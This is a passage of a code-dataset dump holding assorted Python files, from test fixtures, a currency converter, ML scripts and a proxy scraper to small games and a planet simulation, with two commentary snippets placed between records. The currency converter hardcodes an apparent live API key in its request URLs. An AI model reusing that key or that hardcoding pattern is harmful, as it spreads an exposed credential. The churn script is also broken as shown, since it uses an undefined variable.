)\n\n\n@pytest.fixture(scope='function')\ndef sample_event(db):\n 
return create_event(title='test_title', description='test description')\n\n\n@pytest.fixture(scope='function')\ndef sample_event_with_dates(db, sample_event_date_without_event):\n another_event_date = create_event_date(event_datetime='2018-01-02 19:00')\n return create_event(\n title='test_title',\n description='test description',\n event_dates=[sample_event_date_without_event, another_event_date]\n )\n\n\n@pytest.fixture(scope='function')\ndef sample_event_type(db):\n return create_event_type(event_type='short course')\n\n\n@pytest.fixture(scope='function')\ndef sample_event_date(db, sample_event):\n return create_event_date(event_id=sample_event.id)\n\n\n@pytest.fixture(scope='function')\ndef sample_event_date_without_event(db):\n return create_event_date()\n\n\n@pytest.fixture(scope='function')\ndef sample_fee(db, sample_event_type):\n return create_fee(fee=5, conc_fee=3, event_type_id=sample_event_type.id)\n\n\n@pytest.fixture(scope='function')\ndef sample_reject_reason(db, sample_event):\n return create_reject_reason(sample_event.id)\n\n\n@pytest.fixture(scope='function')\ndef sample_speaker(db):\n return create_speaker(name='Paul White')\n\n\n@pytest.fixture(scope='function')\ndef sample_user(db):\n return create_user(email='test_user@example.com', name='Test User')\n\n\n@pytest.fixture(scope='function')\ndef sample_admin_user(db):\n return create_user(email=TEST_ADMIN_USER, name='Admin User', access_area='admin')\n\n\n@pytest.fixture(scope='function')\ndef sample_venue(db):\n return create_venue()\n\n\n# token set around 2017-12-10T23:10:00\n@pytest.fixture(scope='function')\ndef sample_decoded_token():\n start, expiry = get_unixtime_start_and_expiry()\n\n return {\n 'jti': 'test',\n 'exp': expiry,\n 'iat': start,\n 'fresh': False,\n 'type': 'access',\n 'nbf': start,\n 'identity': 'admin'\n }\n\n\n@pytest.fixture\ndef sample_uuid():\n return '42111e2a-c990-4d38-a785-394277bbc30c'\n\n\ndef create_test_db_if_does_not_exist(db):\n try:\n conn = db.engine.connect()\n conn.close()\n\n except sqlalchemy.exc.OperationalError as e:\n if 'database \"{}\" does not exist'.format(TEST_DATABASE_URI.split('/')[-1:][0]) in e.message:\n db_url = sqlalchemy.engine.url.make_url(TEST_DATABASE_URI)\n dbname = db_url.database\n\n if db_url.drivername == 'postgresql':\n subprocess.call(['/usr/bin/env', 'createdb', dbname])\n else:\n raise\n\n\ndef request(url, method, data=None, headers=None):\n r = method(url, data=data, headers=headers)\n r.soup = BeautifulSoup(r.get_data(as_text=True), 'html.parser')\n return r\n\n\ndef create_authorization_header(client_id='testadmin'):\n expires = datetime.timedelta(minutes=1)\n\n token = create_access_token(identity=client_id, expires_delta=expires)\n return 'Authorization', 'Bearer {}'.format(token)\n\n\ndef create_refresh_header(client_id='testadmin'):\n token = create_refresh_token(identity=client_id)\n return 'Authorization', 'Bearer {}'.format(token)\n\n\ndef get_unixtime_start_and_expiry(year=2017, month=12, day=10, hour=23, minute=10):\n from time import mktime\n d = datetime.datetime(year, month, day, hour, minute, 0)\n unixtime = mktime(d.timetuple())\n\n added_time = 900\n unixtime_expiry = unixtime + added_time\n return unixtime, unixtime_expiry\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":7159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
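A sketch of how the auth helpers at the bottom of the conftest are meant to be used in a test; the `client` fixture and the `/events` route are hypothetical, not defined above:

```python
def test_get_events_with_token(client, db_session):
    # create_authorization_header() returns an ('Authorization', 'Bearer <jwt>') tuple
    headers = [create_authorization_header()]
    response = client.get('/events', headers=headers)
    assert response.status_code == 200
```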
+{"seq_id":"606341398","text":"import requests, json, sys\nfrom tools.printer import print_msg, print_tool_name, get_input, clear_console\n\n# api_key=31120a6edf-52f0320c4e-qqu4cg\n\n\nall_codes = dict()\n\ndef get_amount():\n while True:\n try:\n return float(get_input(\"Enter Amount: \"))\n \n except KeyboardInterrupt:\n print_msg(\"warning\", \"\\nProgram Terminated!\\n\")\n exit()\n\n except Exception as e:\n print_msg(\"error\", e)\n continue\n\ndef get_all_codes(display=False):\n try:\n r_data = requests\\\n .get(\"https://api.fastforex.io/currencies?api_key=31120a6edf-52f0320c4e-qqu4cg\")\n\n return json.loads(r_data.content)['currencies']\n\n except requests.exceptions.ConnectionError:\n print_msg(\"error\", \"\\nUnable to Connect to Host! Please check your internet connection\\n\")\n exit()\n\ndef get_curr(payloads):\n try:\n response = requests\\\n .get(\"https://api.fastforex.io/fetch-one\", params=payloads)\n\n r_data = json.loads(response.content)\n\n if \"error\" in r_data:\n raise Exception(r_data['error'])\n\n return r_data\n\n except requests.exceptions.ConnectionError as e:\n print_msg(\"error\", e)\n return False\n\n except Exception as e:\n print_msg(\"error\", e)\n\ndef get_code(text):\n all_codes = get_all_codes()\n while True:\n try:\n code = get_input(text).upper()\n if code in all_codes:\n return code\n else:\n raise Exception(\"The Currency code --> {} does not exist\"\\\n .format(code))\n\n except KeyboardInterrupt:\n print_msg(\"warning\", \"\\nProgram Terminated!\\n\")\n exit()\n\n except Exception as e:\n print_msg(\"error\", e)\n continue\n\n\ndef convert():\n curr_from = get_code(\"Convert From: \")\n curr_to = get_code(\"Convert To: \")\n amount = get_amount()\n\n payloads = {\n \"from\":curr_from, \n \"to\": curr_to, \n \"api_key\":\"31120a6edf-52f0320c4e-qqu4cg\"\n }\n\n data = get_curr(payloads)\n if data != None:\n total = data['result'][curr_to] * amount\n print_msg(\"success\", \"\\n{}-{} ==> {}-{:.2f} \".format(\n curr_from, amount, curr_to, total\n ))\n\ndef converter():\n print_tool_name(\"Aboki $$\", \"Devvyhac\", \"Team Trace Techie\", \"github.com/devvyhac\")\n convert()\n\n","sub_path":"currency_converter/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"402528971","text":"# Vocabulary\nfrom __future__ import division, print_function\n\nimport util.io as io\nimport sys\nfrom collections import defaultdict, Counter\nimport string\nimport nltk\nimport numpy as np\n\nclass Vocab:\n\n def __init__(self, fn = None):\n\n self.D = defaultdict()\n self.idx2word = defaultdict()\n\n # Punctuations.\n self.punc = set(list(string.punctuation))\n # Special tokens.\n self.special_tokens = ['', '', '']\n\n if fn:\n self.load(fn)\n\n\n def save(self, fn):\n io.save_json(self.D, fn)\n\n def load(self, fn):\n d = io.load_json(fn)\n assert(isinstance(d, dict) and '' in d)\n\n self.D = defaultdict(lambda: d[''], d)\n idx2word = [(idx, w) for w, idx in self.D.iteritems()]\n self.idx2word = defaultdict(lambda: '', idx2word)\n\n def __getitem__(self, x):\n if isinstance(x, int):\n return self.idx2word[x]\n else:\n return self.D[unicode(x)]\n\n def __len__(self):\n return len(self.D)\n\n def build_from_corpus(self, corpus, max_size = 100000, min_num = 5):\n '''\n corpus: The textual corpus to build vocabulary from. The format is [string].\n\n max_size: max size of the vocabulary\n min_num: min appearance number of a word that will be included in the vocabulary\n '''\n\n print('[vocab.py] building from corpus')\n\n # filter_words is a list of words that are not wanted to be in the vocabulary\n filter_words = self.punc\n\n # build the vocabulary\n print('>>> tokenizing...')\n # corpus_token = [nltk.word_tokenize(unicode(sent).lower()) for sent in corpus]\n # words = sum(corpus_token, [])\n words = []\n n_sent = len(corpus)\n for i, sent in enumerate(corpus):\n words += nltk.word_tokenize(unicode(sent).lower())\n if i % 100 == 0:\n print('\\r %.2f%%' % (100*i/n_sent), end = '')\n sys.stdout.flush()\n print('')\n\n\n print('>>> counting...')\n word_counter = Counter(words).most_common()\n words_t = [w for (w, c) in word_counter if c >= min_num and w not in filter_words]\n words_t = words_t[0:max_size]\n words_t = self.special_tokens + words_t\n\n print('>>> building dictionary')\n self.D = defaultdict(lambda: words_t.index(''), zip(words_t, range(len(words_t))))\n self.idx2word = defaultdict(lambda: '', zip(range(len(words_t)), words_t))\n\n def encode(self, sent, seq_length = None, decorate = True):\n '''\n Encode sentence(str) into index_seq([int])\n '''\n\n seq = [self.D[w] for w in nltk.word_tokenize(unicode(sent).lower()) if w not in self.punc]\n\n if decorate:\n seq = [self.D['']] + seq + [self.D['']]\n\n if seq_length:\n if len(seq) > seq_length:\n seq = seq[0:seq_length]\n else:\n seq += [self.D['']] * (seq_length - len(seq))\n\n return seq\n\n def decode(self, seq):\n '''\n Decode sentence(str) from seq([word_index])\n '''\n tokens = []\n for idx in seq:\n w = self.idx2word[idx]\n if w == '':\n continue\n elif w == '':\n break\n else:\n tokens.append(w)\n return ' '.join(tokens)\n\n\n def encode_batch(self, sents, seq_length):\n '''\n Encode a batch of sentences. 
The sequecnes will be truncated to the same size\n '''\n\n seqs = [self.encode(sent, seq_length + 1, decorate = True) for sent in sents]\n\n seqs_input = [seq[0:seq_length] for seq in seqs]\n seqs_target = [seq[1::] for seq in seqs]\n \n # mask where is 0 and other token is 1\n v = np.where(np.array(seqs_target) == self.D[''], 0, 1) \n seq_mask = np.where(v[:,::-1].cumsum(1)[:,::-1] > 0, 1, 0).tolist()\n\n return seqs_input, seqs_target, seq_mask\n","sub_path":"modules/vocab.py","file_name":"vocab.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
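The reverse-cumsum trick in `encode_batch` is worth unpacking: it produces a mask that is 1 for every position up to and including the last non-pad token and 0 after it (so interior zeros are kept). A small numpy demonstration with a hypothetical indicator row:

```python
import numpy as np

v = np.array([[1, 1, 0, 1, 0, 0]])             # 0 marks pad-valued positions
mask = np.where(v[:, ::-1].cumsum(1)[:, ::-1] > 0, 1, 0)
print(mask)                                     # [[1 1 1 1 0 0]]
```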
+{"seq_id":"273565905","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 24 13:51:14 2017\r\n\r\n@author: hyungu\r\n\"\"\"\r\n\r\n# Import modules\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.decomposition import PCA\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n\r\nsns.set_style('whitegrid')\r\n\r\n\r\n# Import data\r\ndata = pd.read_csv(\"./0_Data/BreastCancerWisconsin.csv\")\r\nprint(\"- Data has {} rows and {} columns.\".format(*data.shape))\r\nprint(\"- Column names: \", list(data.columns))\r\n\r\n\r\n# Split dataset into X and y\r\nX = data.drop(['diagnosis'], axis=1)\r\nX = X.iloc[:, :10]\r\ny = data['diagnosis']\r\n\r\n\r\n# Standardize data onto unit scale (mean=0 and variance=1)\r\nX = StandardScaler().fit_transform(X)\r\n\r\n\r\n# Perform PCA\r\npca = PCA(n_components=None)\r\nZ = pca.fit_transform(X)\r\nprint(\"- Shape of transformed data: \", Z.shape)\r\n\r\n\r\n# Explained variance ratio of principal components\r\nnum_components = pca.n_components_\r\nexp_var = pca.explained_variance_ratio_\r\ncum_exp_var = np.cumsum(exp_var)\r\n\r\n\r\n# Plot explained variance ratio and cumulative sums\r\nplt.figure(num=1, figsize=(7, 7))\r\nplt.bar(range(num_components), exp_var, alpha=0.5, label='individual explained variance')\r\nplt.step(range(num_components), cum_exp_var, label='cumulative explained variance')\r\nplt.xlabel('Principal components')\r\nplt.ylabel('Explained variance ratio')\r\nplt.legend(loc='best')\r\nplt.show()\r\n\r\n\r\n# Plot the transformed data (Z) with 2 PCs\r\nplt.figure(num=2, figsize=(7, 7))\r\nfor label, color, marker in zip(('B', 'M'), ('blue', 'red'), ('o', '^')):\r\n plt.scatter(Z[y == label, 0], Z[y == label, 1],\r\n label=label, color=color, marker=marker, alpha=0.5)\r\nplt.xlabel('Principal Component 1')\r\nplt.ylabel('Principal Component 2')\r\nplt.legend(loc='best')\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n\r\n# Plot the transformed data (Z) with 3 PCs\r\nfig = plt.figure(num=3, figsize=(7, 7))\r\nax = fig.add_subplot(111, projection='3d')\r\nfor label, color, marker in zip(('B', 'M'), ('blue', 'red'), ('o', '^')):\r\n ax.scatter(Z[y == label, 0], Z[y == label, 1], Z[y == label, 2],\r\n label=label, color=color, marker=marker, alpha=0.5)\r\nax.set_xlabel('Principal Component 1')\r\nax.set_ylabel('Principal Component 2')\r\nax.set_zlabel('Principal Component 3')\r\nax.legend(loc='best')\r\nplt.show(fig)\r\n","sub_path":"sklearn_2017/1일차_실습자료/5_PCA/PrincipalComponentAnalysis.py","file_name":"PrincipalComponentAnalysis.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"478763100","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals, absolute_import, division, print_function\n\nimport re\nimport logging\n\nimport os\nimport sys\ncurrentdir = os.path.dirname(os.path.realpath(__file__))\nparentdir = os.path.dirname(currentdir)\nsys.path.append(parentdir)\n\nfrom agent import Agent\nfrom util.webRequest import WebRequest\n\nlogger = logging.getLogger(__name__)\n\n\n@Agent.register\nclass FreeProxy(Agent):\n def __init__(self):\n self.url = 'https://free-proxy-list.net/'\n self.re_ip_port_pattern = re.compile(\n r\"(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}) (\\d{1,5}) \", re.I)\n\n def extract_proxy(self, page_num=0):\n try:\n rp = WebRequest().get(self.url.format(page=page_num), timeout=10)\n re_ip_port_result = self.re_ip_port_pattern.findall(rp.text)\n for host, port in re_ip_port_result:\n yield f'{host}:{port}'\n\n except:\n pass\n\n\nif __name__ == '__main__':\n p = Agent.proxies[0]()\n for proxy in p.extract_proxy():\n print(proxy)\n","sub_path":"agent/free_proxy.py","file_name":"free_proxy.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"393891435","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 14 21:24:48 2020\n\n@author: encry973r\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\n# import dataset\ndata = pd.read_csv('Churn_Modelling.csv')\n\n# matrix of features and dependent variable\nX = data.iloc[:, 3:13].values\ny = data.iloc[:, 13].values\n\n# convert country column to dummies\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.compose import ColumnTransformer\n\n# ct for the country dimension\nct = ColumnTransformer(transformers=[('one_hot_encoder', \n OneHotEncoder(categories='auto'),\n [1])],\n remainder='passthrough')\nX = ct.fit_transform(X)\n# drop first dummie column\nX = X[:, 1:]\n\n# ct for the gender dimension\nct = ColumnTransformer(transformers=[('one_hot_encoder',\n OneHotEncoder(categories='auto'),\n [3])],\n remainder='passthrough')\nX = ct.fit_transform(X)\n# drop first dummie column\nX = X[:, 1:]\n\n# split dataset into train and test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.2, random_state=0)\n\n# feature scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n# copies for reference\nX_train2 = X_train.copy()\nX_test2 = X_test.copy()\n\n# dimensional reduction : PCA , n_components = 6 ; gave 62.81%\nfrom sklearn.decomposition import PCA\npca = PCA(n_components=6)\nX_train = pca.fit_transform(X_train)\nX_test = pca.transform(X_test)\nexplained_variance_ratio = pca.explained_variance_ratio_\n\n# build ANN\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\nclassifier = Sequential()\n# add input and first hidden layer\nclassifier.add(Dense(units=12, kernel_initializer='uniform', activation='relu', input_dim=6))\n# add second hidden layer\nclassifier.add(Dense(units=12, kernel_initializer='uniform', activation='relu'))\n# add out put layer\nclassifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\nclassifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n# fit ANN to train dataset\nclassifier.fit(X_train, y_train, batch_size=10, epochs=100)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# Build ANN architecture\n# import keras\n# from keras.models import Sequential\n# from keras.layers import Dense\n\n# initialize the classifier\n# classifier = Sequential()\n\n# accuracy\n# units = 6, accuracy = 83.41%\n# units = 11, accuracy = 86.68%\n\n# add input and first hidden\n# classifier.add(Dense(units=11, kernel_initializer='uniform', activation='relu', input_dim=11))\n# # add second hidden layer\n# classifier.add(Dense(units=11, kernel_initializer='uniform', activation='relu'))\n# # output layer\n# classifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\n# # compile network\n# classifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\n# # fit data to classifier\n# classifier.fit(X_train, y_train, batch_size=10, epochs=100)\n\n# # predict for X_test\n# y_pred = classifier.predict(X_test)\n# y_pred = (y_pred > 0.5)\n\n# decision tree classifier\n# 80.25% accuracy\n# from sklearn.tree import DecisionTreeClassifier\n# classifier = DecisionTreeClassifier(criterion='entropy', random_state=0)\n# classifier.fit(X_train, y_train)\n\n# Random Forest Classifier\n# 86.85% accuracy\n# from sklearn.ensemble import 
RandomForestClassifier\n# classifier = RandomForestClassifier(n_estimators=300, criterion='entropy', random_state=0)\n# classifier.fit(X_train, y_train)\n\n# kernel svm\n# 86.85% accuracy\n# from sklearn.svm import SVC\n# classifier = SVC(kernel='rbf', random_state=0)\n# classifier.fit(X_train, y_train)\n\n# poly svm\n# 85.7% accuracy\n# from sklearn.svm import SVC\n# classifier = SVC(kernel='poly', degree=3, random_state=0)\n# classifier.fit(X_train, y_train)\n\n# kmeans\n# 82.95% accuracy\n# from sklearn.naive_bayes import GaussianNB\n# classifier = GaussianNB()\n# classifier.fit(X_train, y_train)\n\n# KNN\n# 82.7% accuracy\n# from sklearn.neighbors import KNeighborsClassifier\n# classifier = KNeighborsClassifier(n_neighbors=5, metric='minkowski', p=2)\n# classifier.fit(X_train, y_train)\n\n\n# # predict for X_test\n# y_pred = classifier.predict(X_test)\n\n\n# show confusion matrix\nfrom sklearn.metrics import confusion_matrix \ncm = confusion_matrix(y_test, y_pred) \n\n# truth = ((cm[0, 0] + cm[1, 1])/cm.sum())*100\n\n# print(str(truth) + '%')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"7DeepLearning/ANN/untitled0.py","file_name":"untitled0.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"64924197","text":"### Joseph Rice 10/2/2017\r\n##\r\n##### Plan for this code down below\r\n##\"\"\" 1. Set the background up for the target\r\n## 2. Get the circles asighned to spasific points trough mouse clicks\r\n## 3. Get the sum of the scores computed on the graphic window\r\n##\r\n## \"\"\" \r\n##\r\n##\r\n##\r\n##\r\n\r\n\r\nmaxX=minY = 10\r\nmaxY=minX = -10\r\n\r\nfrom graphics import *\r\n\"\"\" THIS SETS THE GRAPH WIN UP \"\"\" \r\nfrom math import pi as PIE\r\nfrom math import sqrt\r\nwin = GraphWin(\"Archer Target\", 600,600)\r\nwin.setCoords(minX,minY,maxX,maxY)\r\nwin.setBackground(\"green\")\r\n\r\n## CODE FOR CIRCLES \r\ncenter = Point(0,0)\r\nc_white = Circle(center,5)\r\nc_white.setFill(\"white\")\r\nc_white.draw(win)\r\n\r\nc_black = Circle(center,4)\r\nc_black.setFill(\"purple\")\r\nc_black.draw(win)\r\n\r\ncblue = Circle(center,3)\r\ncblue.setFill(\"Blue\")\r\ncblue.draw(win)\r\n\r\nc_red = Circle(center,2)\r\nc_red.setFill(\"red\")\r\nc_red.draw(win)\r\n \r\nc_yellow = Circle(center, 1)\r\nc_yellow.setFill(\"yellow\")\r\nc_yellow.draw(win)\r\n\r\nTotal_score = Text(Point(0,-9),\"NO RULES!!!!!!!!!!\")\r\n\r\nTotal_score.draw(win)\r\nmessage = Text(Point(0,6), \"Click To Shot Arrow\")\r\nmessage.setStyle(\"bold\")\r\nmessage.draw(win)\r\n\r\n## list for storage \r\ntotal_score = []\r\n\r\n## TEST CODE \r\nTry_1 = win.getMouse()\r\nend_of_arrow = Point(-2,4)\r\n## function for the calulation of radius\r\ndef radus(x,y):\r\n r = sqrt(x**2 + y**2)\r\n return r \r\n## TEST FUNCTION CODE\r\n##value = radus(3,4) \r\n##print(value)\r\n\r\n### function for the logic gate.\r\ndef score(r):\r\n if r <=1:\r\n value = 9\r\n elif r <=2:\r\n value = 7 \r\n elif r <=3:\r\n \r\n value = 5\r\n elif r <=4:\r\n \r\n value = 3\r\n elif r <=5:\r\n \r\n value = 2\r\n else:\r\n \r\n value = 0\r\n return value\r\n\r\nr = radus(Try_1.getX(),Try_1.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New = str(value) + \" Points!\"\r\nTotal_score.setText(message_New)\r\n\r\n## \r\nline = Circle(Point(Try_1.getX(),Try_1.getY()),0.1)\r\nline.setFill(\"black\")\r\nline.draw(win)\r\n\r\nTry_2 = win.getMouse()\r\nr = radus(Try_2.getX(),Try_2.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New2 = str(value) + \" Points !\"\r\nTotal_score.setText(message_New2)\r\n\r\ncir = Circle(Point(Try_2.getX(),Try_2.getY()),0.1)\r\ncir.setFill(\"black\")\r\ncir.draw(win)\r\n\r\nTry_3 = win.getMouse()\r\nr = radus(Try_3.getX(),Try_3.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New3 = str(value) + ' Points !'\r\nTotal_score.setText(message_New3)\r\n\r\ncir_3 = Circle(Point(Try_3.getX(),Try_2.getY()),0.1)\r\ncir_3.setFill(\"black\")\r\ncir_3.draw(win)\r\n\r\nTry_4 = win.getMouse()\r\nr = radus(Try_4.getX(),Try_4.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New4 = str(value) + ' Points !'\r\nTotal_score.setText(message_New4)\r\n\r\ncir_4 = Circle(Point(Try_4.getX(),Try_4.getY()),0.1)\r\ncir_4.setFill(\"black\")\r\ncir_4.draw(win)\r\n\r\nTry_5 = win.getMouse()\r\nr = radus(Try_5.getX(),Try_5.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New5 = str(value) + \" Points !\"\r\nTotal_score.setText(message_New5)\r\n\r\ncir_5 = Circle(Point(Try_5.getX(),Try_5.getY()),0.1)\r\ncir_5.setFill(\"black\")\r\ncir_5.draw(win)\r\n\r\nmessage.setText(\"click to see total\")\r\nwin.getMouse()\r\naddition = 0\r\n\r\n\r\nfor i in total_score:\r\n number_value = int(i)\r\n addition = number_value + 
addition\r\n\r\nmessage.setText(\"Your final score is:{0:7}\".format(addition))\r\n\r\nwin.getMouse()\r\n\r\nwin.close()\r\n\r\n","sub_path":"Archer_Target.py","file_name":"Archer_Target.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
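The five near-identical shot blocks collapse naturally into one loop. A sketch using the script's own globals (`win`, `Total_score`, `total_score`, `score`, `radius`, `Circle`, `Point`); the `play_round` name and `shots` parameter are hypothetical:

```python
def play_round(shots=5):
    for _ in range(shots):
        hit = win.getMouse()
        value = score(radius(hit.getX(), hit.getY()))
        total_score.append(value)
        Total_score.setText(str(value) + " Points!")
        marker = Circle(Point(hit.getX(), hit.getY()), 0.1)  # mark the hit
        marker.setFill("black")
        marker.draw(win)
```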
+{"seq_id":"382668868","text":"def seperate(numbers, threshold):\n thresholdAndOver = []\n thresholdUnder = []\n for i in range(len(numbers)):\n if numbers[i] >= threshold: thresholdAndOver.append(numbers[i])\n else: thresholdUnder.append(numbers[i])\n return thresholdAndOver,thresholdUnder\n\n\na = [ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\nover,under = seperate(a,5)\n\nprint(over,under)\n\n\ndef multiplication_table(n):\n a=[]\n for i in range(1,n+1):\n for j in range(1,n+1):\n mul = i * j\n a.append(mul)\n print(a)\n for k in range(1,n+1):\n a.pop()\n return a\n\nprint(multiplication_table(4))","sub_path":"øvinger 7/gangetabell og lister.py","file_name":"gangetabell og lister.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"282426430","text":"from django.db import models\nfrom django.conf import settings\nfrom event.models import Event\n\n\n# Create your models here.\n\n\nclass Order(models.Model):\n\tuser = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n\tevent = models.ForeignKey(Event, on_delete=models.CASCADE)\n\tprice = models.BigIntegerField('event price', default=0)\n\tdate = models.DateTimeField(auto_now=True)\n\n\tdef __str__(self):\n\t\treturn f'{self.user.username} buy {self.event.title_event}'","sub_path":"order/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"311574549","text":"import numpy as np\n\n\nclass SixSigma ():\n\n '''Implementation of SixSigma method for anomaly detection.\n Six Sigma uses three standard deviations below the mean and three standard deviations\n above the mean to predict anomalies.\n\n Attributes:\n time_window : type int (default = 2)\n 'window size -> number of samples used for calculating the mean and standard deviation'\n\n Example shown in test_six_sigma.py\n '''\n\n\n def __init__(self,time_window=2):\n\n self.time_window = time_window\n self.buffer = []\n\n\n def fit (self,X,y):\n\n '''fit the model. Adjust buffer to obtain only the last time_window number of samples'''\n\n self.buffer.append(X)\n self.buffer = self.buffer[-self.time_window:]\n\n def predict (self,X):\n\n '''predict class for passed data. '''\n\n if len(self.buffer) < self.time_window:\n return None\n else:\n j = 0\n while j < len(X):\n i = 0\n feature_array =[]\n while i < len(self.buffer):\n feature_array.append(self.buffer[i][j])\n i += 1\n average = np.mean(feature_array)\n sigma = np.std(feature_array)\n prediction = int(abs(X[j]) > abs(average) + 3 * abs(sigma))\n if prediction == 1:\n break\n j+=1\n return prediction\n\n","sub_path":"src/skmultiflow/anomaly_detection/six_sigma.py","file_name":"six_sigma.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"41267989","text":"import logging\nimport dtlpy as dl\nfrom importlib import import_module\nfrom plugin_utils import maybe_download_data\nlogger = logging.getLogger(__name__)\n\n\nclass PluginRunner(dl.BasePluginRunner):\n \"\"\"\n Plugin runner class\n\n \"\"\"\n\n def __init__(self, plugin_name):\n self.plugin_name = plugin_name\n pass\n\n def run(self, dataset, model_specs, hp_values, configs=None, progress=None):\n\n maybe_download_data(dataset)\n\n # get project\n # project = dataset.project\n # assert isinstance(project, dl.entities.Project)\n\n # start tune\n cls = getattr(import_module('.adapter', 'zoo.' + model_specs['name']), 'AdapterModel')\n\n final = 1 if self.plugin_name == 'trainer' else 0\n devices = {'gpu_index': 0}\n\n adapter = cls(devices, model_specs, hp_values, final)\n if hasattr(adapter, 'reformat'):\n adapter.reformat()\n if hasattr(adapter, 'data_loader'):\n adapter.data_loader()\n if hasattr(adapter, 'preprocess'):\n adapter.preprocess()\n if hasattr(adapter, 'build'):\n adapter.build()\n adapter.train()\n\n if final:\n return adapter.get_checkpoint()\n else:\n metrics = adapter.get_metrics()\n if type(metrics) is not dict:\n raise Exception('adapter, get_metrics method must return dict object')\n if type(metrics['val_accuracy']) is not float:\n raise Exception(\n 'adapter, get_metrics method must return dict with only python floats. '\n 'Not numpy floats or any other objects like that')\n return metrics\n\n # pipeline_id = str(uuid.uuid1())\n # local_path = os.path.join(os.getcwd(), pipeline_id)\n #\n # #####################\n # # upload for resume #\n # #####################\n # project.artifacts.upload(plugin_name='tuner',\n # session_id=pipeline_id,\n # local_path=local_path)\n #\n # #######################\n # # download for resume #\n # #######################\n # project.artifacts.download(plugin_name='tuner',\n # session_id=pipeline_id,\n # local_path=local_path)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"304848463","text":"from Planet import *\nfrom Spaceship import *\nfrom Frame import *\nfrom Maths import *\nimport time\n\nframe = Frame()\n\nobjects = []\n\nsoleil = Planet(None, \"Soleil\", 1.99e30, 1.39e6, 0, 0)\nsoleil.x = frame.frame.winfo_screenwidth()/2\nsoleil.y = frame.frame.winfo_screenheight()/2\n\nmercure = Planet(soleil, \"Mercure\", 3.29e23, 4.88e3, 5.79e7, 308)\nvenus = Planet(soleil, \"Venus\", 4.87e24, 1.21e4, 1.08e8, 168)\nterre = Planet(soleil, \"Terre\", 5.97e24, 1.27e4, 1.49e8, 175)\nlune = Planet(terre, \"Lune\", 7.35e22, 3.47e3, 3.84e5, 113.8)\nmars = Planet(soleil, \"Mars\", 6.42e23, 6.78e3, 2.27e8, 313)\njupiter = Planet(soleil, \"Jupiter\", 1.90e27, 1.40e5, 7.79e8, 309) \nsaturne = Planet(soleil, \"Saturne\", 5.68e26, 1.16e5, 1.42e9, 168)\nuranus = Planet(soleil, \"Uranus\", 8.68e25, 5.07e4, 2.88e9, 353)\nneptune = Planet(soleil, \"Neptune\", 1.02e26, 4.92e4, 4.50e9, 324)\n\nvaisseau = Spaceship(300, 300)\n\nobjects.append(soleil)\nobjects.append(mercure)\nobjects.append(venus)\nobjects.append(terre)\nobjects.append(lune)\nobjects.append(mars)\nobjects.append(jupiter)\nobjects.append(saturne)\nobjects.append(uranus)\nobjects.append(neptune)\nobjects.append(vaisseau)\n\n##Boucle principale\nFPS=60\nsleepTime = 